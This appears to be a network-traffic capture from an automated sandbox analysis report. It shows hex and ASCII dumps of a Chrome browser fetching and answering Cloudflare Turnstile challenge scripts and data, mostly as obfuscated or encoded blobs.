                                                      2024-04-16 11:56:32 UTC1369INData Raw: 28 31 30 34 38 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 65 5b 69 78 28 31 36 31 39 29 5d 2c 27 77 69 64 67 65 74 49 64 27 3a 66 45 5b 69 78 28 32 34 37 37 29 5d 5b 69 78 28 31 34 39 33 29 5d 2c 27 65 76 65 6e 74 27 3a 65 5b 69 78 28 32 32 33 35 29 5d 2c 27 63 66 43 68 6c 4f 75 74 27 3a 66 45 5b 69 78 28 32 34 37 37 29 5d 5b 69 78 28 39 36 32 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 66 45 5b 69 78 28 32 34 37 37 29 5d 5b 69 78 28 32 39 35 32 29 5d 2c 27 63 6f 64 65 27 3a 69 78 28 35 37 36 29 2c 27 72 63 56 27 3a 66 45 5b 69 78 28 32 34 37 37 29 5d 5b 69 78 28 32 35 39 33 29 5d 7d 2c 27 2a 27 29 29 7d 2c 67 29 7d 2c 66 45 5b 69 76 28 32 36 31 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 2c 69 79 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c
                                                      Data Ascii: (1048)]({'source':e[ix(1619)],'widgetId':fE[ix(2477)][ix(1493)],'event':e[ix(2235)],'cfChlOut':fE[ix(2477)][ix(962)],'cfChlOutS':fE[ix(2477)][ix(2952)],'code':ix(576),'rcV':fE[ix(2477)][ix(2593)]},'*'))},g)},fE[iv(2611)]=function(f,g,h,iy,i,j,k,l,m,n,o,s,
                                                      2024-04-16 11:56:32 UTC1369INData Raw: 2c 6c 3d 69 7a 28 32 37 39 33 29 2c 6b 5b 69 7a 28 31 32 37 36 29 5d 28 6c 29 3e 2d 31 29 66 45 5b 69 7a 28 32 38 37 34 29 5d 28 66 75 6e 63 74 69 6f 6e 28 69 41 29 7b 69 41 3d 69 7a 2c 66 45 5b 69 41 28 32 33 37 38 29 5d 28 29 7d 2c 31 65 33 29 3b 65 6c 73 65 20 69 66 28 69 7a 28 33 38 35 29 21 3d 3d 69 7a 28 31 36 36 38 29 29 6d 3d 5b 6a 5b 69 7a 28 31 38 33 38 29 5d 28 69 7a 28 32 37 39 34 29 2c 64 29 2c 6a 5b 69 7a 28 32 37 31 37 29 5d 2b 65 2c 6a 5b 69 7a 28 36 37 37 29 5d 28 69 7a 28 32 36 39 30 29 2c 66 29 2c 69 7a 28 31 31 32 38 29 2b 67 2c 69 7a 28 38 32 38 29 2b 4a 53 4f 4e 5b 69 7a 28 38 34 36 29 5d 28 68 29 5d 5b 69 7a 28 32 30 34 37 29 5d 28 6a 5b 69 7a 28 32 32 36 36 29 5d 29 2c 66 45 5b 69 7a 28 32 38 37 34 29 5d 28 66 75 6e 63 74 69 6f 6e
                                                      Data Ascii: ,l=iz(2793),k[iz(1276)](l)>-1)fE[iz(2874)](function(iA){iA=iz,fE[iA(2378)]()},1e3);else if(iz(385)!==iz(1668))m=[j[iz(1838)](iz(2794),d),j[iz(2717)]+e,j[iz(677)](iz(2690),f),iz(1128)+g,iz(828)+JSON[iz(846)](h)][iz(2047)](j[iz(2266)]),fE[iz(2874)](function
                                                      2024-04-16 11:56:32 UTC1369INData Raw: 3d 69 76 28 37 39 30 29 2c 66 4c 5b 69 76 28 31 39 33 30 29 5d 3d 69 76 28 32 34 36 39 29 2c 66 4c 5b 69 76 28 34 39 31 29 5d 3d 69 76 28 32 37 38 39 29 2c 66 4c 5b 69 76 28 38 32 33 29 5d 3d 69 76 28 31 34 39 32 29 2c 66 4c 5b 69 76 28 32 35 38 35 29 5d 3d 69 76 28 31 31 38 32 29 2c 66 4c 5b 69 76 28 31 34 34 32 29 5d 3d 69 76 28 35 39 36 29 2c 66 4c 5b 69 76 28 32 36 33 30 29 5d 3d 69 76 28 32 30 30 38 29 2c 66 4d 3d 7b 7d 2c 66 4d 5b 69 76 28 32 33 33 36 29 5d 3d 69 76 28 31 34 33 39 29 2c 66 4d 5b 69 76 28 32 36 37 36 29 5d 3d 69 76 28 31 35 32 31 29 2c 66 4d 5b 69 76 28 36 31 34 29 5d 3d 69 76 28 32 31 38 31 29 2c 66 4d 5b 69 76 28 31 37 36 33 29 5d 3d 69 76 28 31 33 31 33 29 2c 66 4d 5b 69 76 28 31 33 38 34 29 5d 3d 69 76 28 31 31 31 30 29 2c 66 4d
                                                      Data Ascii: =iv(790),fL[iv(1930)]=iv(2469),fL[iv(491)]=iv(2789),fL[iv(823)]=iv(1492),fL[iv(2585)]=iv(1182),fL[iv(1442)]=iv(596),fL[iv(2630)]=iv(2008),fM={},fM[iv(2336)]=iv(1439),fM[iv(2676)]=iv(1521),fM[iv(614)]=iv(2181),fM[iv(1763)]=iv(1313),fM[iv(1384)]=iv(1110),fM
                                                      2024-04-16 11:56:32 UTC1369INData Raw: 66 4e 5b 69 76 28 31 30 35 30 29 5d 3d 69 76 28 39 32 37 29 2c 66 4e 5b 69 76 28 36 39 32 29 5d 3d 69 76 28 32 31 35 38 29 2c 66 4e 5b 69 76 28 32 39 39 34 29 5d 3d 69 76 28 31 36 31 33 29 2c 66 4e 5b 69 76 28 38 34 31 29 5d 3d 69 76 28 35 36 34 29 2c 66 4e 5b 69 76 28 39 33 37 29 5d 3d 69 76 28 32 35 31 35 29 2c 66 4e 5b 69 76 28 39 37 32 29 5d 3d 69 76 28 31 39 39 34 29 2c 66 4e 5b 69 76 28 33 30 37 38 29 5d 3d 69 76 28 35 36 37 29 2c 66 4e 5b 69 76 28 32 34 37 35 29 5d 3d 69 76 28 36 36 33 29 2c 66 4e 5b 69 76 28 32 39 33 33 29 5d 3d 69 76 28 31 31 39 36 29 2c 66 4e 5b 69 76 28 32 32 31 32 29 5d 3d 69 76 28 31 32 31 36 29 2c 66 4e 5b 69 76 28 34 32 32 29 5d 3d 69 76 28 31 34 34 31 29 2c 66 4e 5b 69 76 28 31 30 38 33 29 5d 3d 69 76 28 35 30 36 29 2c 66
                                                      Data Ascii: fN[iv(1050)]=iv(927),fN[iv(692)]=iv(2158),fN[iv(2994)]=iv(1613),fN[iv(841)]=iv(564),fN[iv(937)]=iv(2515),fN[iv(972)]=iv(1994),fN[iv(3078)]=iv(567),fN[iv(2475)]=iv(663),fN[iv(2933)]=iv(1196),fN[iv(2212)]=iv(1216),fN[iv(422)]=iv(1441),fN[iv(1083)]=iv(506),f
                                                      2024-04-16 11:56:32 UTC1369INData Raw: 76 28 31 39 36 33 29 2c 66 50 5b 69 76 28 31 33 38 34 29 5d 3d 69 76 28 32 36 36 35 29 2c 66 50 5b 69 76 28 35 34 39 29 5d 3d 69 76 28 31 31 31 35 29 2c 66 50 5b 69 76 28 32 36 39 38 29 5d 3d 69 76 28 32 33 36 37 29 2c 66 50 5b 69 76 28 32 35 37 37 29 5d 3d 69 76 28 32 32 37 31 29 2c 66 50 5b 69 76 28 35 39 34 29 5d 3d 69 76 28 31 36 39 38 29 2c 66 50 5b 69 76 28 31 39 30 33 29 5d 3d 69 76 28 38 36 32 29 2c 66 50 5b 69 76 28 34 30 32 29 5d 3d 69 76 28 31 37 35 37 29 2c 66 50 5b 69 76 28 39 37 30 29 5d 3d 69 76 28 32 39 37 39 29 2c 66 50 5b 69 76 28 31 31 35 35 29 5d 3d 69 76 28 31 32 37 30 29 2c 66 50 5b 69 76 28 31 38 35 31 29 5d 3d 69 76 28 32 32 32 35 29 2c 66 50 5b 69 76 28 36 31 33 29 5d 3d 69 76 28 31 34 32 31 29 2c 66 50 5b 69 76 28 38 33 32 29 5d
                                                      Data Ascii: v(1963),fP[iv(1384)]=iv(2665),fP[iv(549)]=iv(1115),fP[iv(2698)]=iv(2367),fP[iv(2577)]=iv(2271),fP[iv(594)]=iv(1698),fP[iv(1903)]=iv(862),fP[iv(402)]=iv(1757),fP[iv(970)]=iv(2979),fP[iv(1155)]=iv(1270),fP[iv(1851)]=iv(2225),fP[iv(613)]=iv(1421),fP[iv(832)]
                                                      2024-04-16 11:56:32 UTC1369INData Raw: 34 32 32 29 5d 3d 69 76 28 32 36 38 36 29 2c 66 51 5b 69 76 28 31 30 38 33 29 5d 3d 69 76 28 31 33 36 37 29 2c 66 51 5b 69 76 28 38 37 33 29 5d 3d 69 76 28 32 31 39 39 29 2c 66 51 5b 69 76 28 32 32 30 37 29 5d 3d 69 76 28 31 36 36 32 29 2c 66 51 5b 69 76 28 32 37 37 31 29 5d 3d 69 76 28 31 37 37 34 29 2c 66 51 5b 69 76 28 31 39 33 30 29 5d 3d 69 76 28 32 34 34 38 29 2c 66 51 5b 69 76 28 34 39 31 29 5d 3d 69 76 28 31 37 31 36 29 2c 66 51 5b 69 76 28 38 32 33 29 5d 3d 69 76 28 31 30 39 35 29 2c 66 51 5b 69 76 28 32 35 38 35 29 5d 3d 69 76 28 31 34 37 35 29 2c 66 51 5b 69 76 28 31 34 34 32 29 5d 3d 69 76 28 32 39 34 30 29 2c 66 51 5b 69 76 28 32 36 33 30 29 5d 3d 69 76 28 39 33 35 29 2c 66 52 3d 7b 7d 2c 66 52 5b 69 76 28 32 33 33 36 29 5d 3d 69 76 28 32 30
                                                      Data Ascii: 422)]=iv(2686),fQ[iv(1083)]=iv(1367),fQ[iv(873)]=iv(2199),fQ[iv(2207)]=iv(1662),fQ[iv(2771)]=iv(1774),fQ[iv(1930)]=iv(2448),fQ[iv(491)]=iv(1716),fQ[iv(823)]=iv(1095),fQ[iv(2585)]=iv(1475),fQ[iv(1442)]=iv(2940),fQ[iv(2630)]=iv(935),fR={},fR[iv(2336)]=iv(20
                                                      2024-04-16 11:56:32 UTC1369INData Raw: 35 31 29 5d 3d 69 76 28 32 31 39 34 29 2c 66 53 5b 69 76 28 36 31 33 29 5d 3d 69 76 28 32 30 39 30 29 2c 66 53 5b 69 76 28 38 33 32 29 5d 3d 69 76 28 31 30 34 31 29 2c 66 53 5b 69 76 28 31 38 32 39 29 5d 3d 69 76 28 31 30 32 34 29 2c 66 53 5b 69 76 28 32 35 36 32 29 5d 3d 69 76 28 31 38 32 30 29 2c 66 53 5b 69 76 28 31 30 35 30 29 5d 3d 69 76 28 31 33 30 36 29 2c 66 53 5b 69 76 28 36 39 32 29 5d 3d 69 76 28 32 37 37 39 29 2c 66 53 5b 69 76 28 32 39 39 34 29 5d 3d 69 76 28 31 38 38 36 29 2c 66 53 5b 69 76 28 38 34 31 29 5d 3d 69 76 28 35 32 36 29 2c 66 53 5b 69 76 28 39 33 37 29 5d 3d 69 76 28 31 30 32 32 29 2c 66 53 5b 69 76 28 39 37 32 29 5d 3d 69 76 28 31 35 34 32 29 2c 66 53 5b 69 76 28 33 30 37 38 29 5d 3d 69 76 28 33 30 37 30 29 2c 66 53 5b 69 76 28
                                                      Data Ascii: 51)]=iv(2194),fS[iv(613)]=iv(2090),fS[iv(832)]=iv(1041),fS[iv(1829)]=iv(1024),fS[iv(2562)]=iv(1820),fS[iv(1050)]=iv(1306),fS[iv(692)]=iv(2779),fS[iv(2994)]=iv(1886),fS[iv(841)]=iv(526),fS[iv(937)]=iv(1022),fS[iv(972)]=iv(1542),fS[iv(3078)]=iv(3070),fS[iv(
                                                      2024-04-16 11:56:32 UTC1369INData Raw: 69 76 28 32 36 33 30 29 5d 3d 69 76 28 32 35 35 34 29 2c 66 55 3d 7b 7d 2c 66 55 5b 69 76 28 32 33 33 36 29 5d 3d 69 76 28 33 39 36 29 2c 66 55 5b 69 76 28 32 36 37 36 29 5d 3d 69 76 28 31 33 33 33 29 2c 66 55 5b 69 76 28 36 31 34 29 5d 3d 69 76 28 32 35 33 35 29 2c 66 55 5b 69 76 28 31 37 36 33 29 5d 3d 69 76 28 36 32 30 29 2c 66 55 5b 69 76 28 31 33 38 34 29 5d 3d 69 76 28 31 34 31 35 29 2c 66 55 5b 69 76 28 35 34 39 29 5d 3d 69 76 28 31 32 36 38 29 2c 66 55 5b 69 76 28 32 36 39 38 29 5d 3d 69 76 28 31 37 39 33 29 2c 66 55 5b 69 76 28 32 35 37 37 29 5d 3d 69 76 28 37 36 36 29 2c 66 55 5b 69 76 28 35 39 34 29 5d 3d 69 76 28 32 33 34 36 29 2c 66 55 5b 69 76 28 31 39 30 33 29 5d 3d 69 76 28 31 39 31 33 29 2c 66 55 5b 69 76 28 34 30 32 29 5d 3d 69 76 28 31
                                                      Data Ascii: iv(2630)]=iv(2554),fU={},fU[iv(2336)]=iv(396),fU[iv(2676)]=iv(1333),fU[iv(614)]=iv(2535),fU[iv(1763)]=iv(620),fU[iv(1384)]=iv(1415),fU[iv(549)]=iv(1268),fU[iv(2698)]=iv(1793),fU[iv(2577)]=iv(766),fU[iv(594)]=iv(2346),fU[iv(1903)]=iv(1913),fU[iv(402)]=iv(1
                                                      2024-04-16 11:56:32 UTC1369INData Raw: 31 37 31 32 29 2c 66 56 5b 69 76 28 33 30 37 38 29 5d 3d 69 76 28 31 34 37 36 29 2c 66 56 5b 69 76 28 32 34 37 35 29 5d 3d 69 76 28 31 30 33 30 29 2c 66 56 5b 69 76 28 32 39 33 33 29 5d 3d 69 76 28 31 33 30 31 29 2c 66 56 5b 69 76 28 32 32 31 32 29 5d 3d 69 76 28 39 32 38 29 2c 66 56 5b 69 76 28 34 32 32 29 5d 3d 69 76 28 32 33 30 32 29 2c 66 56 5b 69 76 28 31 30 38 33 29 5d 3d 69 76 28 31 35 34 38 29 2c 66 56 5b 69 76 28 38 37 33 29 5d 3d 69 76 28 32 33 38 35 29 2c 66 56 5b 69 76 28 32 32 30 37 29 5d 3d 69 76 28 31 32 35 36 29 2c 66 56 5b 69 76 28 32 37 37 31 29 5d 3d 69 76 28 32 38 38 38 29 2c 66 56 5b 69 76 28 31 39 33 30 29 5d 3d 69 76 28 32 37 30 35 29 2c 66 56 5b 69 76 28 34 39 31 29 5d 3d 69 76 28 31 33 34 32 29 2c 66 56 5b 69 76 28 38 32 33 29 5d
                                                      Data Ascii: 1712),fV[iv(3078)]=iv(1476),fV[iv(2475)]=iv(1030),fV[iv(2933)]=iv(1301),fV[iv(2212)]=iv(928),fV[iv(422)]=iv(2302),fV[iv(1083)]=iv(1548),fV[iv(873)]=iv(2385),fV[iv(2207)]=iv(1256),fV[iv(2771)]=iv(2888),fV[iv(1930)]=iv(2705),fV[iv(491)]=iv(1342),fV[iv(823)]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.549725104.17.2.1844435528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-16 11:56:32 UTC438OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-04-16 11:56:33 UTC248INHTTP/1.1 200 OK
                                                      Date: Tue, 16 Apr 2024 11:56:33 GMT
                                                      Content-Type: image/png
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: max-age=2629800, public
                                                      Server: cloudflare
                                                      CF-RAY: 8753fe231fd653d4-ATL
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-16 11:56:33 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                      Data Ascii: 3dPNGIHDRsIDAT$IENDB`
                                                      2024-04-16 11:56:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.549726104.17.3.1844435528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-16 11:56:33 UTC916OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1360135987:1713267177:eg-nWfnh6VWXyBLyYRHZmVxAI3xrmNba1OE1g2HfQMw/8753fe19daf9b0e5/0ac2a8def4e2792 HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      Content-Length: 2747
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      Content-type: application/x-www-form-urlencoded
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      CF-Challenge: 0ac2a8def4e2792
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://challenges.cloudflare.com
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/jgoie/0x4AAAAAAAQ_ajLYJ-oSKSIN/auto/normal
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-04-16 11:56:33 UTC2747OUTData Raw: 76 5f 38 37 35 33 66 65 31 39 64 61 66 39 62 30 65 35 3d 64 74 46 4c 49 4c 78 4c 53 4c 62 4c 30 31 51 48 31 51 39 4c 31 4b 70 62 59 75 31 42 51 59 51 56 36 4b 7a 5a 32 51 34 33 51 54 4b 59 58 4b 68 71 51 63 6a 45 51 59 62 73 51 50 7a 57 6d 51 70 32 42 58 46 51 76 48 4e 6e 51 6b 64 4b 68 54 44 51 42 24 75 43 51 78 6a 32 51 42 31 4c 33 57 57 51 46 32 70 6a 51 66 56 38 46 63 46 64 59 4c 68 36 51 45 58 50 78 4f 49 51 59 32 5a 74 70 39 74 74 51 55 6b 75 32 70 62 41 62 51 51 43 68 68 31 33 24 46 55 7a 4f 37 51 33 62 51 4b 4c 31 54 43 53 62 51 77 68 32 51 63 4c 31 67 6e 68 4c 32 72 4d 4f 46 43 68 46 51 71 5a 4b 74 51 68 46 51 56 6d 43 43 51 31 46 51 52 4c 68 4d 51 70 66 36 78 25 32 62 58 51 37 6f 32 51 59 4c 70 54 54 6f 32 6e 2d 70 43 57 51 66 46 4f 77 47 46 6f
                                                      Data Ascii: v_8753fe19daf9b0e5=dtFLILxLSLbL01QH1Q9L1KpbYu1BQYQV6KzZ2Q43QTKYXKhqQcjEQYbsQPzWmQp2BXFQvHNnQkdKhTDQB$uCQxj2QB1L3WWQF2pjQfV8FcFdYLh6QEXPxOIQY2Ztp9ttQUku2pbAbQQChh13$FUzO7Q3bQKL1TCSbQwh2QcL1gnhL2rMOFChFQqZKtQhFQVmCCQ1FQRLhMQpf6x%2bXQ7o2QYLpTTo2n-pCWQfFOwGFo
                                                      2024-04-16 11:56:33 UTC711INHTTP/1.1 200 OK
                                                      Date: Tue, 16 Apr 2024 11:56:33 GMT
                                                      Content-Type: text/plain; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cf-chl-gen: wVCpP9lOcMsFReFFhe31XDb+KX2SNykk0RVZstm277Gwtt7tT3TTvfF4gqjZyK4ZywmZIhSm6RZ2mQ49A2H/jcuKT6IDDLY/MfNUqIbceJgaYhIRCBv0rFhaDvtq39i5QdNAixtIaGRdEOlyebLog+pNenjJ7x5bhbHVmYA4/U97f24Orm4b8vDRqoe+PKNcSVKvkJKcnP+cYzF5Tj3eeRScU0I1v7h/vVSLCjgPvmm4ujwdOSQAbD4n012ULproeWOoFborFN3JLZmThXSspPtMTKgsfGrxEuT+sGttD8zpdGtfHdrpe99zcZ0ZpSrNBtaIFjxhc9qRONzNrMbrjo5yygH0bSBkGLuyMn3FLBA32wsOlPM2Ew19hBRQ5z+jBdZ5OHcnwxuBGtu6F0PlAjpTPEj7E0ySXXbZkt3ZKYFiWF7lKY41xtipPt41891p$yFFC+rkuXgmf9VEuZrVRmQ==
                                                      Server: cloudflare
                                                      CF-RAY: 8753fe261ae153b5-ATL
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-16 11:56:33 UTC658INData Raw: 37 63 65 38 0d 0a 68 56 70 35 69 35 4e 4f 59 6d 43 47 5a 31 56 71 69 48 6c 59 61 6c 69 59 6e 48 6d 54 67 32 52 67 68 58 68 79 68 57 71 61 71 33 36 41 6f 61 4f 42 68 49 4f 65 6b 35 42 33 6f 48 47 70 73 48 79 74 71 33 6d 52 6a 35 2b 5a 6c 49 53 6d 6d 63 44 49 76 5a 2b 4b 79 63 76 4b 77 36 65 37 70 59 62 47 7a 4d 36 4b 79 74 47 74 6c 72 48 4c 78 37 69 7a 73 72 2f 42 74 62 62 44 78 62 76 46 32 37 6e 47 77 75 44 51 35 63 2f 48 33 65 6a 51 39 39 6a 31 79 39 58 6d 32 64 66 4d 74 74 58 41 39 4e 41 42 32 39 48 44 41 2b 4c 6f 44 4f 4d 48 42 63 76 37 30 41 38 4f 37 39 38 47 35 78 41 54 43 50 55 59 44 4f 37 58 32 74 6e 31 2f 4f 4c 68 37 78 59 4b 49 2b 59 49 48 68 73 6d 4c 52 72 79 44 2f 50 77 44 44 6b 76 2b 52 45 48 42 66 51 55 48 44 73 77 49 44 30 66 50 6b 51 55 4e
                                                      Data Ascii: 7ce8hVp5i5NOYmCGZ1VqiHlYaliYnHmTg2RghXhyhWqaq36AoaOBhIOek5B3oHGpsHytq3mRj5+ZlISmmcDIvZ+KycvKw6e7pYbGzM6KytGtlrHLx7izsr/BtbbDxbvF27nGwuDQ5c/H3ejQ99j1y9Xm2dfMttXA9NAB29HDA+LoDOMHBcv70A8O798G5xATCPUYDO7X2tn1/OLh7xYKI+YIHhsmLRryD/PwDDkv+REHBfQUHDswID0fPkQUN
                                                      2024-04-16 11:56:33 UTC1369INData Raw: 62 45 39 74 5a 31 74 4c 58 56 30 37 56 33 64 76 64 44 34 2b 56 55 56 2f 5a 31 74 6d 6a 6d 79 4f 65 6c 35 53 54 59 6c 32 64 6e 4a 55 69 6c 61 58 69 32 78 37 6e 6e 68 72 6d 33 70 35 6b 58 47 42 6d 6d 46 6c 67 61 57 74 6e 58 75 41 72 58 32 76 6b 36 46 79 75 57 75 45 70 4a 75 4c 6a 36 65 79 67 4c 71 69 72 38 57 30 75 4d 65 48 6f 4a 6d 4b 78 63 69 75 6f 73 47 6f 75 39 54 4b 31 4c 2f 44 73 35 58 62 78 39 4c 54 6b 5a 61 62 6f 75 4f 7a 30 72 62 59 31 2b 50 41 70 2b 33 6e 78 39 37 48 6f 2b 7a 44 37 65 33 7a 73 4f 54 4a 73 38 69 38 2b 37 58 4a 38 39 4f 37 2b 76 6a 43 34 41 54 2b 32 77 73 48 44 73 73 48 7a 50 33 68 7a 2b 7a 67 46 75 6f 4d 45 65 6f 44 2b 4f 58 54 45 43 41 67 39 75 7a 66 39 69 59 61 2b 53 58 66 2f 41 30 74 37 42 38 72 4a 76 34 45 4a 67 63 6a 43 43 48
                                                      Data Ascii: bE9tZ1tLXV07V3dvdD4+VUV/Z1tmjmyOel5STYl2dnJUilaXi2x7nnhrm3p5kXGBmmFlgaWtnXuArX2vk6FyuWuEpJuLj6eygLqir8W0uMeHoJmKxciuosGou9TK1L/Ds5Xbx9LTkZabouOz0rbY1+PAp+3nx97Ho+zD7e3zsOTJs8i8+7XJ89O7+vjC4AT+2wsHDssHzP3hz+zgFuoMEeoD+OXTECAg9uzf9iYa+SXf/A0t7B8rJv4EJgcjCCH
                                                      2024-04-16 11:56:33 UTC1369INData Raw: 6a 4a 2f 53 7a 70 52 54 55 42 54 57 31 52 69 66 56 39 34 53 34 36 48 6b 46 4a 76 61 31 2b 55 69 56 43 50 5a 32 6d 58 56 6e 32 53 62 46 78 7a 61 35 69 5a 6e 47 46 6a 64 5a 57 44 71 48 75 44 66 6f 61 70 6e 5a 79 73 63 4b 69 7a 63 59 2b 4e 6c 6e 74 76 66 4c 64 37 76 63 4f 64 65 33 65 51 77 49 4e 37 70 35 65 4b 71 72 75 68 72 4d 61 6f 76 38 47 7a 31 4e 6a 52 72 71 65 34 74 5a 53 33 72 4e 54 62 6d 35 32 32 34 4d 61 34 74 64 37 49 79 75 33 6b 71 39 6a 76 79 63 62 51 30 64 33 4b 76 39 54 52 73 66 44 71 76 50 62 31 2b 4c 2f 68 76 66 76 66 43 4d 55 41 31 75 73 48 39 65 72 76 43 66 72 77 32 2f 4c 78 34 77 34 58 39 65 59 52 2b 2f 6f 52 41 50 34 4c 2f 76 73 44 44 2f 49 6d 4a 77 62 32 44 41 73 74 44 52 6f 74 4b 2b 4d 63 4a 51 4d 4f 44 77 34 44 37 7a 48 35 45 68 77 58
                                                      Data Ascii: jJ/SzpRTUBTW1RifV94S46HkFJva1+UiVCPZ2mXVn2SbFxza5iZnGFjdZWDqHuDfoapnZyscKizcY+NlntvfLd7vcOde3eQwIN7p5eKqruhrMaov8Gz1NjRrqe4tZS3rNTbm5224Ma4td7Iyu3kq9jvycbQ0d3Kv9TRsfDqvPb1+L/hvfvfCMUA1usH9ervCfrw2/Lx4w4X9eYR+/oRAP4L/vsDD/ImJwb2DAstDRotK+McJQMODw4D7zH5EhwX
                                                      2024-04-16 11:56:33 UTC1369INData Raw: 4e 6f 61 45 4a 66 61 47 6c 46 67 49 64 64 5a 6d 5a 6f 55 6d 61 4a 62 6e 61 54 61 49 2b 59 68 6c 5a 35 61 58 39 62 62 35 5a 62 6b 4a 31 34 71 58 68 2b 6c 35 61 42 61 6d 6d 5a 72 4c 4f 6e 6c 4a 65 31 70 62 4b 70 71 49 69 4c 72 5a 5a 37 6c 4c 32 64 72 33 2b 66 68 61 4b 55 68 5a 53 68 7a 4b 2f 4c 6b 4c 72 52 77 4d 50 49 77 64 6a 4e 70 64 62 4d 7a 64 57 74 6d 72 43 73 75 75 53 2b 31 72 61 66 32 4d 69 67 73 2b 72 6c 78 64 72 67 78 37 4c 48 77 63 48 4f 38 38 4c 57 34 36 33 4d 31 62 76 79 38 64 36 2b 37 2b 53 39 77 51 62 6f 77 73 59 41 39 65 76 4f 2b 64 30 44 33 4f 66 76 45 76 48 6f 41 75 62 33 47 77 66 7a 44 4e 76 67 46 52 38 44 46 2f 63 44 2f 50 33 30 46 65 4d 48 49 66 73 41 43 79 51 6c 38 4f 37 76 42 50 45 73 4b 42 4d 4c 4b 68 4c 33 48 77 41 52 48 52 63 2f 47
                                                      Data Ascii: NoaEJfaGlFgIddZmZoUmaJbnaTaI+YhlZ5aX9bb5ZbkJ14qXh+l5aBammZrLOnlJe1pbKpqIiLrZZ7lL2dr3+fhaKUhZShzK/LkLrRwMPIwdjNpdbMzdWtmrCsuuS+1raf2Migs+rlxdrgx7LHwcHO88LW463M1bvy8d6+7+S9wQbowsYA9evO+d0D3OfvEvHoAub3GwfzDNvgFR8DF/cD/P30FeMHIfsACyQl8O7vBPEsKBMLKhL3HwARHRc/G
                                                      2024-04-16 11:56:33 UTC1369INData Raw: 63 68 59 47 42 61 30 78 38 6b 58 53 4a 54 34 31 50 55 5a 4a 76 6a 70 79 57 63 6e 75 61 65 5a 70 64 6b 6c 6c 37 61 4a 57 59 70 35 69 73 6d 34 56 38 63 6f 57 45 67 4b 53 66 6a 36 5a 77 64 37 5a 30 71 4c 71 7a 6d 72 53 67 6f 4b 47 58 6d 37 72 42 69 4d 4b 35 78 4d 75 62 79 61 47 36 6a 4a 47 48 72 37 4c 49 6c 70 47 6e 6c 74 4f 70 78 38 6e 68 6d 63 36 30 73 73 66 64 79 4f 69 35 6e 61 4c 42 77 63 58 72 37 38 37 4b 73 4d 4f 74 36 65 66 34 31 75 66 51 72 39 37 39 39 2f 33 5a 30 4f 51 42 33 66 62 53 34 76 55 4d 43 63 73 4c 36 67 37 6c 7a 4f 2f 64 38 2b 62 54 39 41 58 4d 7a 66 59 58 48 43 41 56 44 43 44 7a 48 67 63 6d 41 67 72 7a 48 79 49 56 47 52 30 43 37 2b 77 49 49 75 38 55 39 6a 6a 78 38 52 7a 32 43 78 2f 33 2f 41 6e 39 45 44 6f 64 45 51 2f 35 45 7a 6c 4a 48 6b
                                                      Data Ascii: chYGBa0x8kXSJT41PUZJvjpyWcnuaeZpdkll7aJWYp5ism4V8coWEgKSfj6Zwd7Z0qLqzmrSgoKGXm7rBiMK5xMubyaG6jJGHr7LIlpGnltOpx8nhmc60ssfdyOi5naLBwcXr787KsMOt6ef41ufQr9799/3Z0OQB3fbS4vUMCcsL6g7lzO/d8+bT9AXMzfYXHCAVDCDzHgcmAgrzHyIVGR0C7+wIIu8U9jjx8Rz2Cx/3/An9EDodEQ/5EzlJHk
